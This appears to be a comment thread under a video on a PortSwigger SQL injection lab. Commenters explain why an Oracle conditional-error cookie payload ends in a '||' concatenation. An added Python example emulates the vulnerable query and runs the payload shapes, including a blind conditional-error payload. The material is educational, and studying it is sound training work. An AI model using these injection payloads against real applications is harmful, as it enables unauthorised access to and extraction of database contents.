Hello, please help me with the following: at 1:37, why do you put "||" at the end of the query? PortSwigger shows the same, but I still cannot understand why. Thanks for the video.
@mavisjelena5154 3 years ago
I've got the same question, too.
@BelowAverageRazzleDazzle 3 years ago
@mavisjelena5154 It's a string concatenation operator in Oracle DBs. You have to try to imagine what the query looks like in the source code and also what your insertion point is within the query. From there you have to imagine what you can insert while still maintaining proper syntax at the end of the completed query. Also consider what the web app page code looks like. They're both in play. docs.oracle.com/cd/A87860_01/doc/server.817/a85397/operator.htm

We don't have the benefit of seeing the source code here, but I'm guessing the insertion point is in the WHERE clause. Also, the source code of the page may only be expecting a specific number of columns and rows back from the database, say for example 1 row and 2 columns. This is probably why [cookie value]' AND SELECT... doesn't work: it returns unexpected results (more columns or more rows) than the page code is expecting, causing a 500 server-side error all the time even though the SQL syntax may be correct. String concatenation allows you to insert text into one of the expected columns returned, thus not exceeding the number of rows and columns the web page app code is expecting back. So you don't blow up the page by having the DB produce unexpected and unhandled columns/rows.

Something to keep in mind is that most web apps will behave this way. They're going to expect a specific number of rows and columns in the source code. Additionally, strongly typed languages such as C# may even be expecting a specific data type (int, char, varchar, etc.). They address the possibility of incompatible data types by having the conditional error return nothing/null. So the end result is that nothing is concatenated to the original cookie string. The two outcomes are either a divide-by-zero error, which causes a 500 error on the page, or the query concatenates nothing/null to the cookie and the page behaves as normal, as the web app gets exactly what it's expecting from the DB. It's crafty...
@giorgiozunino 3 years ago
@BelowAverageRazzleDazzle Thanks a lot! I can understand how to concatenate in this situation, but I cannot understand the last concatenation operator. Is there anything after that? I think the SQL statement is:
SELECT column FROM table WHERE trackingid = 'cookie'
and with the payload it would be:
SELECT column FROM table WHERE trackingid = 'cookie' || (SELECT '' FROM dual) || '
Then what are we concatenating with the last operator? (I really want to be clear with my English :) ) Thanks!
@elgasplatte 3 years ago
@giorgiozunino I wondered the exact same thing, but I think I figured it out. If the SQL statement is:
SELECT column FROM table WHERE trackingid = "cookie"
(I changed the ' to " so you can see which are the original ones.) The payload would make the query:
SELECT column FROM table WHERE trackingid = "cookie' || (Select statement)"
So now you have one " left, which breaks the syntax. You can solve that with the additional || thingy:
SELECT column FROM table WHERE trackingid = "cookie' || (Select statement) || ' "
which just concatenates some empty string. But what also works is the method we learned before:
SELECT column FROM table WHERE trackingid = "cookie' || (Select statement)-- "
I have tested both methods and they work.
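The quote-balancing point made in the two replies above, as an added example that is not part of the thread, the video or the PortSwigger lab. It emulates the vulnerable query with SQLite, which (like Oracle) uses ' for string literals and || for concatenation, so the three cookie shapes under discussion can be run and compared: without the trailing ||, the application's own closing quote is left dangling and the statement fails to parse; with || ' or with a -- comment it parses and returns the normal row. The table name, column name, cookie value and the build_query() function are constructed assumptions about what the server-side code looks like. The conditional_payload() helper keeps the shape of the lab's CASE WHEN payload but substitutes abs(-9223372036854775807-1) for Oracle's TO_CHAR(1/0), because SQLite returns NULL for 1/0 instead of raising an error; that substitution is an assumption for the emulation only.

```python
import sqlite3

# Added example (not from the video or PortSwigger): emulation of the vulnerable
# query with SQLite. Table, column and cookie value are constructed sample data.
COOKIE = "abc123"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (trackingid TEXT)")
    conn.execute("INSERT INTO tracking VALUES (?)", (COOKIE,))
    return conn


def build_query(cookie):
    # Hypothetical server-side code: the cookie is pasted straight into the SQL
    # text, between the quotes of the WHERE clause. That is the injection point.
    return f"SELECT trackingid FROM tracking WHERE trackingid = '{cookie}'"


def run(conn, cookie):
    """Return ('ok', rows) when the query parses and runs, ('error', message)
    otherwise. A real application would turn the error case into an HTTP 500."""
    try:
        return ("ok", conn.execute(build_query(cookie)).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


# The three cookie shapes discussed in the thread.
PAYLOADS = {
    # Unbalanced: the app's own closing quote is left dangling after the subquery.
    "no_trailing_concat": COOKIE + "' || (SELECT '')",
    # Balanced with || ': the final ' pairs with the app's closing quote, so the
    # statement concatenates an empty string and stays syntactically valid.
    "trailing_concat": COOKIE + "' || (SELECT '') || '",
    # Balanced with a comment: everything after --, including the app's quote,
    # is ignored by the parser.
    "comment": COOKIE + "' || (SELECT '')--",
}


def conditional_payload(condition):
    # Shape of the lab's conditional-error payload. Assumed SQLite substitute for
    # Oracle's TO_CHAR(1/0): abs() of the smallest 64-bit integer raises
    # "integer overflow", whereas 1/0 in SQLite silently returns NULL.
    err = "abs(-9223372036854775807-1)"
    return COOKIE + f"' || (SELECT CASE WHEN ({condition}) THEN {err} ELSE '' END) || '"


if __name__ == "__main__":
    db = make_db()
    for name, payload in PAYLOADS.items():
        print(f"{name:20s} {build_query(payload)!r}")
        print(f"{'':20s} -> {run(db, payload)}")
    for cond in ("1=1", "1=2"):
        print(f"condition {cond:5s} -> {run(db, conditional_payload(cond))}")
```

Running it prints the full statement the application would execute for each cookie value, which is the part the thread says you have to "imagine"; the true condition produces a database error (the 500 in the lab) and the false one returns the row exactly as an unmodified cookie would.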
@jamesarthur6019 3 years ago
Really appreciated | From India
@KaranMaurya-f1t 1 month ago
Sir, you have the Pro version, so it was easy for you to enumerate the password, but we have the Community version; you should also give an alternative for us 😅